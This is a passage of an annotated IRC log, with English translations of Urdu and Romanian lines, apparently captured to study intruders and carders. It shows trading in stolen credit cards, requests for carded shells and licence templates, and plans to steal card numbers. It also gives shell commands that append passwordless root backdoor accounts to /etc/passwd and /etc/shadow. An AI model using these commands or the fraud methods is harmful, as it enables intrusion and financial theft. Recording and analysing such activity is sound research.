      nothing's hot. naveed has asked for some marijuana (chars = marijuana/pot)
      
      :D1ck :HAHAHAHAAHAHA
      :J4n3 :hehehe yeah
      :D1ck :woh charas peeta hai? apni girlfreind ka chakroon may juis nay is ko ghaas nahindali?
      
      does he do marijuana? (Note:: something about his girlfriend being involved in marijuana too)
      
      :D1ck :ROFL
      :J4n3 :lol 
      :D1ck ::)
      :D1ck ::)
      :J4n3 :hah chars tho shroo say peetha hai pehlay bee main day chuka hon usko
      
      hah. he was having marijuana since the beginning. earlier i had given him some too
      
      :D1ck :lol
      :D1ck :oki
      :D1ck :tum charas latay hoon?
      
      do you also do marijuana?
      
      :[Agent] :anyone wants to have proxy list, cc list, RH bash shell eggable..msg me if ur serious
      :J4n3 :haan , i have many relations with drug mafia hehe
      :D1ck :(if answer=yes) { d4v3== "should not take" else printf ("its ok\n");
      :D1ck :lol
      :Flapjack- :Anyone trade cc for bnc? Msg me
      :D1ck :char drugs[80]'
      :D1ck :char drugs[80];
      :J4n3 :hehe
      :J4n3 :lol
      :D1ck ::)
      :J4n3 :main bee peetha hon kabee kabee mood hoay par
      
      i have some depends on the mood
      
      :D1ck :oh
      :D1ck :(@|S4n4m|): wasalamz
      
      salutations
      
      :D1ck :(sawera): w/salam
      :D1ck :chix?
      :D1ck :bawt?
      :J4n3 :yup |S4n4m| = mine
      :D1ck :hahaa
      :D1ck :all-chicks = yure
      :dmonchild :ACTION i am selling hardware if your intrested please /msg me for prices thanks
      :J4n3 :<|S4n4m|> key tum ko kuch kam karna hay
      
      hey do you want to do some work?
      
      :J4n3 :> thum falsafi kub say ban gayee ?
      
      since when did you become a philosopher?
      
      :J4n3 :<|S4n4m|> jab sey tum sey bat ki hay
      
      since the time i've started talking to you
      
      :J4n3 :aaaaahhhhhhhhhh
      :D1ck :hhaha
      :D1ck ::P
      :D1ck :mv logs.txt bhabi.txt
      
      (Note:: bhabi = sister-in-law)
      
      :J4n3 :lol
      :J4n3 :oye
      :D1ck :<bhab> cat bhabi.txt
      :D1ck :<bhabi> I WILL KILL U D4v3
      :D1ck :?
      :J4n3 :muhahahahahhahahahahhhaa
      :J4n3 :HHAHAHAHAHAHAH
      :D1ck ::)
      :J4n3 :heheheheh
      :J4n3 :ROFLMAO
      :D1ck :(:
      :J4n3 :ROFLMAO
      :D1ck :=P
      :m4r1n4ru :Away
      :dmonchild :ACTION i am selling hardware if your intrested please /msg me for prices thanks
      :m4r1n4ru :Away
      :Dariox :who trade cc
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :[Agent] :anyone can card me a laptop?
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :telnet- :anyone can card me a shell or web domain....pls answer to me
      :m4r1n4ru :Away
      :[Agent] :wanna trade
      
      Romanian:
      
      :|S4n4m| :tum aisey hi bolna
      
      Just keep on saying like this
      
      :|S4n4m| :karna kuch nahi
      
      dont do anything
      
      :J4n3 :ye baath hai ?
      
      is that the deal?
      
      :|S4n4m| :han
      
      yes
      
      :|S4n4m| :yeh bat hay
      
      that is the deal
      
      :J4n3 :ping bot aaraha hai
      
      the ping bot is coming
      
      :|S4n4m| :instooooooooooooooooooooo
      :|S4n4m| ::)
      :|S4n4m| :karachi mey aooo
      
      come to karachi
      
      :J4n3 :ok bot aagaya
      
      ok the bot is here
      
      :J4n3 :d3s|r3 hai uska nick
      
      it's nick is d3s|r3
      
      :J4n3 :ab main channel par tyep karo ping me
      
      now type in the main channel in ping (Note:: dont know what it translates to)
      
      :J4n3 :<d3s|r3> PiNG THiNGiE - hiall's ping reply took 13 seconds
      :|S4n4m| :hmmm
      :|S4n4m| :tahnks
      :J4n3 :dekha ?
      
      saw that?
      
      :J4n3 :ab khush ?
      
      now are you happy?
      
      :|S4n4m| :han
      
      yes
      
      :|S4n4m| :kush
      
      happy
      
      :J4n3 :bus thum khush raho :)
      
      that's all ... keep staying happy :)
      
      :|S4n4m| :wah
      
      cool
      
      :|S4n4m| :kya bat hay app ki
      
      what shall i say about you
      
      :|S4n4m| :wasey
      :|S4n4m| :mey ney ek bandha rakh leeya hay
      
      i have kept one system for myself
      
      :|S4n4m| :ping key leyya
      
      for pinging
      
      :J4n3 :thumara bandaa 24 hour nahin betay gas
      
      your system wont be for 24 hours (Note:: again i am having difficulty translating - grammar issues in urdu
      
      :J4n3 :mera bot hoga
      
      my bot will
      
      :|S4n4m| :hmmmmmmmmmm
      :|S4n4m| :instoo
      :|S4n4m| :zara 5 min key leyee
      
      for a little bit... 5 mins
      
      :|S4n4m| :karachi channel per
      
      on karachi channel
      
      :|S4n4m| :flori ka interview ley loo
      
      take flori's interview
      
      :|S4n4m| :mey ney appoint kya hay
      
      i have appointed (him/her?)
      
      :J4n3 :hahaha nahin thum khud hee laylo
      
      yes yes, but take it yourself (the interview)
      
      :|S4n4m| :kyon
      
      why?
      
      :|S4n4m| :tum yahn key op hoo
      
      you are the op here
      
      :|S4n4m| :admintration mey hoo
      
      i am in administration
      
      :J4n3 :op thum oh main co-founder hon
      
      you are the op, i am the co-founder
      
      :J4n3 :aaayee meraa dil......chua kay lagyeeee...churanay wali meri qaatil
      
      ohhh.... she stole my heart
      
      :|S4n4m| :han wohi hii
      
      yes, her
      
      :|S4n4m| :hello
      :|S4n4m| :kya hoa
      
      what happened?
      
      :J4n3 :wait
      :J4n3 :.up
      :J4n3 :.op netra
      :J4n3 :.op Ott0
      :Dew :Hey J4n3 u there ?
      :J4n3 :.host add J4n3 *
      :J4n3 :.up
      :J4n3 :OngHome esay $uptime
      :D1ck :J4n3 
      :D1ck :i`m getting my own server;)
      :D1ck :J4n3 
      :D1ck :J4n3 
      :J4n3 :D1ck
      :J4n3 :i'm here
      :D1ck :hehe
      :D1ck :J4n3 
      :J4n3 :hehe
      :J4n3 :D1ck
      :D1ck :oye give me those commands for linux password adding and sun adding re ro re r i gave u
      :D1ck ::P
      :D1ck :i lost mine
      :J4n3 :wait
      :D1ck :and i dont wana make again
      :J4n3 :cp /etc/passwd /etc/.tp;
      :J4n3 :echo "ro::99999::::::" >> /etc/shadow;
      :J4n3 :echo "r::99999::::::" >> /etc/shadow;
      :J4n3 :echo "ro:x:500:1000::/:/bin/bash" >> /etc/passwd;
      :J4n3 :echo "r:x:0:0::/:/bin/bash" >> /etc/passwd;
      :J4n3 :cp /etc/shadow /etc/.ts;
      :D1ck :k
      :J4n3 ::p
      :D1ck :and suhn
      :D1ck :?
      :D1ck :sun
      :D1ck :?
      :J4n3 :wait
      :D1ck :gimme sun tew
      :D1ck :k
      :J4n3 :cp /etc/passwd /etc/.tp;
      :J4n3 :echo "re::6445::::::" >> /etc/shadow;
      :J4n3 :echo "r::10891::::::" >> /etc/shadow;
      :J4n3 :echo "re:x:500:1000:daemon:/:/sbin/sh" >> /etc/passwd;
      :J4n3 :echo "r:x:0:0:User:/:/sbin/sh" >> /etc/passwd;
      :J4n3 :cp /etc/shadow /etc/.ts;
      :D1ck :thx
      :J4n3 :np :p
      :D1ck :oye
      :D1ck :me getting a box
      :D1ck :T+3
      :D1ck :T3
      :J4n3 :wow
      :J4n3 :kewl
      :D1ck :where should i get?
      :D1ck :where is j0e getting
      :D1ck :d4v3 i want the folling domains
      :J4n3 :folling ?
      
      (Note:: misspelt "following")
      
      :D1ck example.org
      :J4n3 :j0e say contact nahi huwa called him 2 times
      
      j0e said there has been no contact ... called him 2 times
      
      :D1ck :wetcunts.net
      :J4n3 :example hmm
      :J4n3 :mil jayega agar register nahi huwa hai tho
      
      we will get it if it has not been registered
      
      :D1ck :undefined.net
      :D1ck :and kewl ones
      :D1ck :but not one's that end with zzz
      :D1ck :like dreamzzz.net
      :D1ck :etc
      :D1ck :eeet.org
      :D1ck :eeet.net
      :D1ck :oye
      :D1ck :how much j0e paid
      :D1ck :and what server?
      :J4n3 :he paid 250 $
      :J4n3 :from example.net
      :D1ck :kewl
      :D1ck :for a T3?
      :J4n3 :and yeah example.org  and com net all available :p
      :J4n3 :T1 i think
      :D1ck :kewl
      :D1ck :get me please
      :D1ck :oh
      :J4n3 :yaar CC :(
      :J4n3 :no CC right now 
      :J4n3 :yaar u have that bind weapon why dont u hit a big shoping site and take cc's ?
      
      (Note:: here's where they hatch the idea of stealing CCs)
      
      :D1ck :yep
      :D1ck :oki
      :D1ck : welp why dont we all hang in 
      :D1ck :it was my channel and i think ti still is
      :J4n3 :abay yaar sub fraud hotha hai wahan par
      
      hey dude, a lot of fraud goes on there
      
      :J4n3 :their CC's do not work
      :D1ck :hehe
      :J4n3 :bauth try kiya hai undernet and effnet par
      
      tried a lot on undernet and effnet
      
      :D1ck :k
      :D1ck :heh k
      :D1ck :<shellad:#shellz> DIGITALINET offers quality web hosting staring at 6$ a
      :D1ck :                  month. Signup for webhosting with digitalinet and get your
      :D1ck :                  domain for 11$ a year
      :D1ck :                  information.
      :D1ck :i`ll buy 2 legit domains there
      :J4n3 :haha i had a shell from there
      :D1ck :kewl
      :J4n3 :they closed shell service now 
      :J4n3 :adult web hosting :p
      :D1ck :lol
      :J4n3 :service achee thee buree nahin thee
      
      the service was good, not bad at all
      
      :D1ck :haha
      :J4n3 :oye sex time
      :J4n3 :brb
      :J4n3 :br
      :J4n3 :bbl
      :J4n3 :shayed so gaya
      
      seems like he's gone to sleep
      
      :D1ck :ahahahha
      :J4n3 :hehe
      :J4n3 :g0ne
      :D1ck :.join 
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :^w1nX^ :cc
      :^w1nX^ :cc
      :^w1nX^ :sleepin chann
      :^w1nX^ :trade
      :^w1nX^ :sleepin chann
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :trade
      :atlanta.ga.us.undernet.org 005 spitz SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :are supported by this server
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :nirvana19 :e cinevA de aici si pe rocarding?
      @ is somebody here also on #rocarding?
      
      (Note:: definitely not urdu here
      
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :Bl4ck_ :not again
      :Bl4ck_ :-up
      :nirvana19 :I buy stuff
      :SLaZz :who wants to trade cc's ??
      :nirvana19 :gfnbfg
      :nirvana19 :someone from romania?
      :savantul :yes
      :_Mephisto :multi
      @ a lot of (people)
      :_Mephisto ::)
      :nirvana19 :aveti ceva marfa?
      @do you have some stuff?
      
      (Note:: ??)
      
      :nirvana19 :cumpar
      @ I buy
      
      :_CardMan_ :re ppl
      :Bl4ck_ :arrrrrrrrrrrrrrrrr
      :Bl4ck_ :-up
      :_CardMan_ :what is new ?
      :Bl4ck_ :shitttttttttttttt
      :_CardMan_ :stupid bots
      :Bl4ck_ :-up
      :Bl4ck_ :-up
      :_CardMan_ :this is fun....
      :Bl4ck_ :Omblad0n up
      :Bl4ck_ :Omblad0n op
      :Bl4ck_ ::>>
      :Bl4ck_ :arrrrrr
      :_CardMan_ :Bl4ck_....do u know what u r doing ?
      :Bl4ck_ :dunoo
      :_CardMan_ :i saw....
      :_CardMan_ :so ... any romanian people here ?
      :bug____ :ops
      :_CardMan_ :bug____...whats up ?
      :savantul :lots
      :bug____ :nimic man
      @ nothing man
      
      :_CardMan_ :ok...
      :bug____ :I need cc
      :bug____ :lol
      :_Mephisto :me too
      :_CardMan_ :pai care e din bucale si are niste cc-uri bune (NU bunicele, sau extrapolate) sa initieze o privata repede....
      @ so, those who is from Bucharest and who has some good cc (NOT "good enough" or extrapolated), let's start fast "a private one" (conversation) ...
      
      (Note:: ??)
      
      :nirvana19 :da o gramada de romanian pepole pe aici
      @ lots of romanian people here
      
      (Note:: ??)
      
      :bug____ :1 cc
      :bug____ :1
      :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede....
      @ so, those who is from Bucharest and who has some good cc, not bogus, let's start fast "a private one" (conversation) ...
      
      :_CardMan_ :care esti pe kappa (IP: 192.168.254.95
      :_CardMan_ :DNS: dialup-56k-95.example.xx
      :_CardMan_ :si dai cu scanarea ?
      @ who are you on kappa (IP: 192.168.254.95
      @ DNS: dialup-56k-95.example.xx ( kappa.ro ??)
      @ and are you scanning ?
      
      :nirvana19 :de unde pot sa fac rost de Legion 2.1
      @where can I get Legion 2.1
      
      :_Mephisto :de la mine
      @from me
      
      :_CardMan_ :nirvana19.... LOLZ... nu stiai ca are back door mah ?
      @ ...LOLZ... didn't you knew that is has backdoor?
      
      :nirvana19 :poti sa mi-l dai?
      @ could you give it to me?
      
      :dlotos33 :Is there any Romania friends?
      :bug____ :nope
      :dlotos33 :Is there any Romania friends?
      :_CardMan_ :a lots 
      :Co0lWoRx :any1 here wanna earn +v, msg me
      :Co0lWoRx :any1 here wanna earn +v, msg me
      :v|Adu :re 
      :v|Adu ::)
      :Co0lWoRx :ACTION any1 here wanna earn +v, msg me
      :v|Adu :anybody need a drop place ?
      :nirvana19 :de unde esti ma vladule?
      @ where are you from vladu?
      
      :_CardMan_ :v|Adu.... lasa-te de meserie ....
      @ ... got it lost ....
      
      :v|Adu ::)))))))
      :v|Adu :cardman 
      :v|Adu ::)
      :v|Adu :hahahahah
      :v|Adu ::)
      :_CardMan_ :suck it 
      
      (Note:: ?? - all this is either romanian or some other language)
      @ yes, this is romanian slang
      
      
      :Co0lWoRx :ACTION any1 here wanna earn +v, msg me
      :nirvana19 :sorry
      :Co0lWoRx :ok
      :Co0lWoRx :np
      :xroach :anybody have any driver license template ? 
      :xroach :anybody have any driver license templates ? 
      :bug____ :u can save my ass with  1 cc
      :xroach :actually any good templates would be nice
      :bug____ :I got some sites
      :v|Adu :re 
      :Co0lWoRks :ACTION any1 wanna earn +v in 
      :Co0lWoRks :ACTION any1 wanna earn a virgin card, msg me now
      :Co0lWoRks :ill bbl, since no one wants anything here
      :Bl4ck_ :-up
      :Bl4ck_ :?
      :Bl4ck_ :soory
      :Bl4ck_ :I`ll go
      :dlotos33 :anyone have CC?
      :s1z1f :yes
      :xroach :anyone have or know where i could get license templates or any templates for mag cards ? 
      :s1z1f :do enyone have cc?
      :dlotos33 :Does any one speak germany?
      :_CardMan_ :do not think so ...
      :2red :i speak some german
      :2red :why?
      :dlotos33 :What means "ORT" at GERMANY?
      :2red :city?
      :dlotos33 :thank you ,my friend
      :MaTiX_00 :hello
      :MaTiX_00 :anyone got a proxy for me to use?
      :dlotos33 :yes
      :SpRiTe^^^ :HI
      :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede....
      @ (idem)
      
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ :4,4 xxxx xxxx xxxx xxxx
      :SpRiTe^^^ :0,4 xxxx xxxx xxxx xxxx
      :SpRiTe^^^ :4,4 xxxx xxxx xxxx xxxx
      :SpRiTe^^^ :0,0 1,1 xxxx xxxx xxxx xxxx
      :kurky :Any GOOOOOOOD carders here? msg me
      :kurky :Anyone here got a UK cc??? Msg me
      :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA
      :][VaMpIrE :hi
      :][VaMpIrE :wanna trade?
      :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA
      :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede....
      @ (idem)
      
      :_CardMan_ :m4r1n4ru...salve mah 
      @ m4r1n4ru...hello man
      
      :m4r1n4ru :-op
      :xroach :anybody have any dl templates ? cia/fbi/nsa would be cool too
      :s1z1f :do enybody have cc?
      :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA
      :s1z1f :do enybody have cc?
      :[SK]Kane :care aveti un proxy bun de www?
      @ who has a good www proxy?
      
      :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede....
      @ (idem)
      
      :SpRiTe^^^ :H
      :SpRiTe^^^ :ok
      :m4r1n4ru :-op
      :s1z1f :do enybody have cc?
      :s1z1f :do enybody have cc?
      :dariuss :am yo 1000
      :s1z1f :do enybody have cc?
      :natedogg :i do..
      :s1z1f :pls give it to me
      :natedogg :trade...
      :natedogg :mgs me..
      :s1z1f :pls give it to me
      :s1z1f :do enybody have cc?
      :natedogg :sizif ---------------banned#no more trade kind.....
      :s1z1f :do enybody have cc?
      :s1z1f :pls give it to me
      :s1z1f :do enybody have cc?
      :pimpg :yeah
      :pimpg :if you would like one you have to send me one first
      :pimpg :then if it approves
      :s1z1f :ok
      :pimpg :i will send one to you
      :pimpg :sound good
      :pimpg :pm me if you would like me 2
      :D1ck :Tota1KaaS join #delusion
      :D1ck :Tota1KaaS say #delusion Ok, NOW introducing the the First Shell hosting company in pakitan, with excellent domains, Vhosts ip, bots, on a T3 HUB, coming soon.
      :D1ck :Tota1KaaS say #delusion If interested say on main, and one of the admins will message :)
      :D1ck :Tota1KaaS say #delusion Ok, NOW introducing the the First Shell hosting company in pakitan, with excellent domains, Vhosts ip, bots, on a T3 HUB, coming soon.
      :D1ck :Tota1KaaS say #delusion If interested say on main, and one of the admins will message :)
      :dariuss :Bl4ck_-))
      :Bl4ck_ :se man
      :s1z1f :*** pimpg (~ricky@exo01-ca.example.net) has joined 
      :s1z1f :*** Retrieving 
      :s1z1f :<s1z1f> do enybody have cc?
      :s1z1f :<s1z1f> pls give it to me
      :s1z1f :*** Retrieving 
      :s1z1f :*** natedogg has quit IRC (Signed off)
      :s1z1f :<s1z1f> do enybody have cc?
      :s1z1f :<pimpg> yeah
      :s1z1f :<pimpg> if you would like one you have to send me one first
      :s1z1f :<pimpg> then if it approves
      :Ghici :re ppl
      :pimpg :hello
      :pimpg :would anyone like to trade, i dont go first
      :D1ck :D4v3
      :D1ck :WHEN BACK MSG ME
      :s1z1f :do enybody have cc?
      :dariuss :ACTION c ya
      :m4r1n4ru :Away
      :m4r1n4ru :I have Returned.
      :m4r1n4ru :Away
      :s1z1f :do enybody have cc?
      :m4r1n4ru :Away
      :Bon_Jovi :m4r1n4ru 
      :s1z1f :do enybody have cc?
      :Bon_Jovi :yep
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :s1z1f :do enybody have cc?
      :m4r1n4ru :Away
      :D1ck :hey J4n3
      :J4n3 :what's new :p ?
      :D1ck :server
      :D1ck :buying
      :D1ck :but what did j0e say
      :D1ck :which is good one?
      :J4n3 :buying ? confirmed ?
      :D1ck :i got 10 domains
      
      (Note:: at this point i guess they have closed the deal with the previous CCs)
      
      :D1ck ::P
      :D1ck :freind bought them
      :D1ck :hreh
      :D1ck :yup
      :J4n3 :usay khud sahi nahi patha usnay sirf example try kiya hai aur wo sahi nahi laga usay
      
      he himself doesnt know really, he just tried example and it didnt look all right to him
      
      :D1ck :example.net sux?
      :D1ck :oh
      :J4n3 :great  
      :D1ck :(@J4n3): great
      :D1ck :?
      :J4n3 :haha u said friend already bought it ?
      :D1ck :domains
      :D1ck ::)
      :J4n3 :oh
      :J4n3 :but from where u planning to buy ?
      :D1ck :kuch samhaj nahi aa rahi
      
      cant understand anything
      
      :D1ck :where should i buy
      :D1ck :Server Space: Single Server
      :D1ck :IP Numbers: 30
      :D1ck :Bandwidth: 50 Gigs
      :D1ck :Services: Level 1 (Included)
      :D1ck :Monitor: 24/7 Network Monitoring (Included)
      :D1ck :--------------------------------------------------------------------------------
      :D1ck :Payment Plan: $2,182.80 paid Annually
      :D1ck :Setup Fee: $100.00
      :D1ck :--------------------------------------------------------------------------------
      :D1ck :Total Startup: $2,282.80
      :D1ck :SkyNetWEB Ltd.
      :D1ck :3500 Boston St.
      :D1ck :Baltimore Maryland, 21224
      :D1ck :Phone: 410.563.6384
      :D1ck :Fax: 410.563.5457
      :D1ck :Server Space: Single Server
      :D1ck :IP Numbers: 30
      :D1ck :Bandwidth: 50 Gigs
      :J4n3 :2,828 ?
      :D1ck :Services: Level 1 (Included)
      :D1ck :Monitor: 24/7 Network Monitoring (Included)
      :D1ck :--------------------------------------------------------------------------------
      :D1ck :Payment Plan: $2,182.80 paid Annually
      :D1ck :Setup Fee: $100.00
      :D1ck :--------------------------------------------------------------------------------
      :D1ck :Total Startup: $2,282.80
      :D1ck :SkyNetWEB Ltd.
      :D1ck :3500 Boston St.
      :D1ck :Baltimore Maryland, 21224
      :D1ck :Phone: 410.563.6384
      :D1ck :Fax: 410.563.5457
      :D1ck :yeah
      :D1ck :per year
      :D1ck ::(?
      :D1ck :or :?
      :J4n3 :but he got it about 800 $ total i think with all system p2 400 64 mb ram and 8.4 gb hd
      :D1ck ::)?
      :m4r1n4ru :Away
      :D1ck :but
      :D1ck :that was one month
      :D1ck :remmeber?
      :J4n3 :hmm
      :J4n3 :u mean thats all for one year ?
      :J4n3 :and u gonna pay for it ?
      :D1ck :tell me
      :D1ck :what should i do?
      :D1ck :i`m confewsed
      
      (Note:: you man "confused"... kiddie)
      
      :J4n3 :yaar aaj raath tak wait karlo
      
      dude, wait till tonight
      
      :J4n3 :let me ask some more ppl
      :D1ck :oki
      :J4n3 :teeek haina ?
      
      it's ok with you, right?
      
      :J4n3 :i'll ask miller too
      :D1ck :oki
      :D1ck :ok
      :D1ck :my budget is 170-200/month
      :J4n3 :hmm k
      :D1ck :>Domain Name 1....: example.com
      :D1ck :>Domain Name 2....: example.com
      :D1ck :>Domain Name 3....: example.com
      :D1ck :>Domain Name 4....: example.com
      :D1ck :>Domain Name 5....: example.com
      :D1ck :>Domain Name 6....: example.com
      :D1ck :>Domain Name 7....: example.com
      :D1ck :>Domain Name 8....: example.com
      :D1ck :>Domain Name 9....: example.com
      :D1ck :>Domain Name 10...: example.com
      :D1ck :>Total............: $649.50
      :J4n3 :oh already registered ?
      :D1ck :yup
      :J4n3 :how many years ?
      :D1ck :1
      :J4n3 :thats expensive
      :J4n3 :wait
      :D1ck :who cares
      :D1ck :its cared
      :J4n3 :let me check
      :J4n3 :oh
      :J4n3 :then its ok but wait
      :D1ck :oki
      :D1ck :(Sephirot): I need help , SOme one can help me
      :J4n3 :heh
      :D1ck :=p
      :J4n3 :oye
      :D1ck :?
      :J4n3 :u could got those 10 domain for 2 years at 300 $   and for 5 years at 750 $
      :D1ck :kewl
      :D1ck :from where?
      :J4n3 :dotster
      :D1ck :dotster.com
      :D1ck :?
      :J4n3 :1 year: $15  2 year: $30 
      :J4n3 :5 year: $75 10 year: $150 
      :J4n3 ::)
      :J4n3 :yeah
      :D1ck :cool
      :D1ck ::P
      :J4n3 :we'll get more from there
      :D1ck :oki
      :D1ck :;)
      :D1ck :yaar
      
      dude
      
      :D1ck :i want the server
      :D1ck :b4d
      :D1ck :kuch samhaj nahin aa rahi
      
      cant understand anything
      
      :J4n3 :haha jald baazi math karo 
      
      haha, dont make haste
      
      :D1ck :oye who could make a kewl kewl kewl webpage for webhosting and shell accounts?
      :m4r1n4ru :Away
      :J4n3 :coz u going to pay from ur pocket
      :D1ck :lol oki
      :J4n3 :zara ache thara maaloom karnay do
      
      let's locate some good chap
      
      :D1ck :ok;)
      :J4n3 :page design karnay ka masla nahi wo hojayega dont worry
      
      dont worry about the page design problem, it shall be done
      
      :D1ck :oki kewl
      :D1ck ::)
      :D1ck :oye
      :J4n3 :i'm gonna open a cosmetics shop at tariq road :p
      :D1ck :1pani nay apna server liya tha or rent?
      
      has j0e bought the server or rented it?
      
      (Note:: aek in hindi/urdu - pronounce: ache... means one. so 1pani would be j0e that they
      always refer to)
      
      :J4n3 :yea ?
      :J4n3 :liya tha
      
      had bought it
      
      :D1ck :kewl hehe
      :D1ck ::/
      :D1ck ::/
      :J4n3 :agar thum kaho tho j0e kee baath karwatha hon thum say
      
      if you say so, i can tell you j0e's deal
      
      :D1ck :oh
      :J4n3 :usay kahonga thumain call karday
      
      i will ask him to call you
      
      :J4n3 :ok ?
      :D1ck :ok
      :D1ck :sure
      :D1ck ::)
      :D1ck :but after 9
      :D1ck :but after 9 pm
      :J4n3 :teeek hai phir khud hee pooch lena sub kuch
      
      ok then just ask him everything yourself
      
      :D1ck :coz i`ll be sleeping
      :J4n3 :hmm ok
      :D1ck :k;/
      :D1ck :;/
      :J4n3 ::)
      :J4n3 :tariq road , cosmetic shop, kewl kewl bachiyan *wink*
      
      bachiyan = chicks
      
      :D1ck :lol
      :D1ck :hahahaha
      :J4n3 :hehe yeah
      :J4n3 :have u seen that new building dolmen mall ?
      :D1ck ::P
      :D1ck :nop
      :m4r1n4ru :Away
      :J4n3 :hmm phir dekhna , its kewl and most beautiful market in karachi
      
      hmmm then take a look at it, it's cool and most beautiful market in karachi
      
      :J4n3 :yaar give me a kewl host , aisa jis main psybnc chalaon aur crash na ho, meray ziyad thar roots main make command work nahi kartha :(
      
      dude, give me a cool host, such that if we run psybnc on it, it doesnt crash.
      
      (Note:: i am having problems with some urdu words, but the word-by-word translation for
      the rest of it is:
      
      meray = mine
      main = in
      nahi = doesnt
      kartha = happens
      
      the last part is.."make command doesnt work in this")
      
      :D1ck ::))
      :D1ck :oh
      :D1ck :i will send u psybnc-compiled
      :D1ck :when i boot
      :D1ck ::)
      :J4n3 :oh then its kewl :)
      :J4n3 :tight
      :J4n3 :for sparc na ?
      :D1ck :yeps
      :J4n3 :great waiting ...
      :D1ck :abey abhi ruk heheheh
      
      hey wait for now heheheh
      
      :D1ck :i am tlking to the person for col
      :D1ck ::P
      :D1ck ::pPpp
      :J4n3 :haha ruka huwa hon jub boot karo tho daydena hehe
      
      haha, i am waiting. when you boot then give it up hehe
      
      :D1ck :*** Joins: tOpDaWgGy (KoRn@spc-isp-tor-58-18-419.example.xx)
      :D1ck :(tOpDaWgGy): dAwGgGYY
      :D1ck :(tOpDaWgGy): chinii
      :D1ck :(tOpDaWgGy): jApAniIii
      :D1ck :(@D1ck): hEYyYYyYy
      :D1ck :(@D1ck): dOgYY
      :D1ck :hehehe
      :J4n3 :hehehe
      :D1ck ::)
      :m4r1n4ru :Away
      :D1ck :oye
      :D1ck :read
      :D1ck :http://www.example.net/Contracts/CIT-Colocation%20Agreement.html
      :D1ck :tell me i it have some clawa
      :D1ck :tell me i it have some claws
      :J4n3 :wait
      :D1ck :k
      :J4n3 :errror araha hai
      
      there's an error
      
      :D1ck :works for me
      :J4n3 :hmm nope not working let me try on netscape
      :D1ck :k
      :D1ck :(tOpDaWgGy): shAe.. dAwG bhai
      :J4n3 :Plan A:  20 gigs/month [64kbps avg.], * up to 30 IP addresses  ($150.00
      :J4n3 :      per month)
      :D1ck :is ko doggy kay ilawa
      
      this one as an alternative to doggy
      
      :J4n3 :thats what u want to buy ?
      :D1ck :nope
      :D1ck :40 gig
      :D1ck :256 ips
      :J4n3 :Plan B:  40 gigs/month [128kbps avg], * up to 62 IP addresses  ($250.00
      :J4n3 :      per month)
      :J4n3 :its 62 in 40 gigs
      :D1ck :yep but he sed he will allow 256 if not needed
      :D1ck :needded
      :J4n3 :oh then its okay package is kool
      :D1ck :kewl
      :J4n3 :.msg G_u_Y__  abay oye chichoray mmoooon band kar apna 
      
      hey you squirt, shut your mouth
      
      PRIVMSG G_u_Y__ :abay oye chichoray mmoooon band kar apna 
      
      hey you squirt, shut your mouth
      
      :D1ck :best firwalling and dos protection in town
      :D1ck :lol
      :J4n3 :hmm kewl
      :J4n3 :oye add my this host to bots plz :)
      :m4r1n4ru :Away
      :D1ck :sure
      :D1ck :whats yure ip
      :D1ck :/whois J4n3
      :J4n3 :*
      :D1ck :onghome.com
      :D1ck :oki
      :D1ck :.host add J4n3 *
      :D1ck :brb
      :J4n3 :thanx :)
      :m4r1n4ru :Away
      :J4n3 :.join #karachi
      :m0sTwAnTdpinG
      :G_u_Y__
      
      you and i will get along well
      
      :J4n3 :.msg #karachi GUY ullooo kay pattay moon band rakko apna
      
      you stupid chaps, keep your mouth shut
      
      :sawera
      
      hey ask those who are about to die what their last wish is
      
      :G_u_Y__
      :J4n3 :oops
      :J4n3 : ?
      :J4n3 :say A?
      :G_u_Y__
      
      dearest
      
      :J4n3 :.say #karachi GUY Ullooo kay pattay mooon band rakko apna :p
      
      you stupid chaps, keep your mouth shut
      
      :J4n3 :.part #karachi
      :m4r1n4ru :Away
      :D1ck :J4n3
      :D1ck :my dadi's bro died today, so my dad is off to lahore
      :D1ck :shit
      :D1ck :ab this kaam will latkofy
      
      now this work will be left hanging
      
      :J4n3 :oh
      :J4n3 :Inna lillaaye wa inna ilayae raajioon
      
      (Note:: some prayer to allah it seems)
      
      :J4n3 :very sorry
      :D1ck ::p
      :D1ck :yep he was 85, this is life, ppl come and go
      :D1ck :hehe
      :D1ck :its ok
      :D1ck :;)
      :J4n3 :oh
      :D1ck ::)
      :J4n3 :phir tho time tha jaanay ka unkay
      
      then it was time for him to go
      
      :J4n3 :i thought he was young
      :J4n3 ::p
      :D1ck :nop
      :D1ck :hehe
      :J4n3 :hehe
      :D1ck ::)
      :D1ck :oye
      :D1ck :what i say is
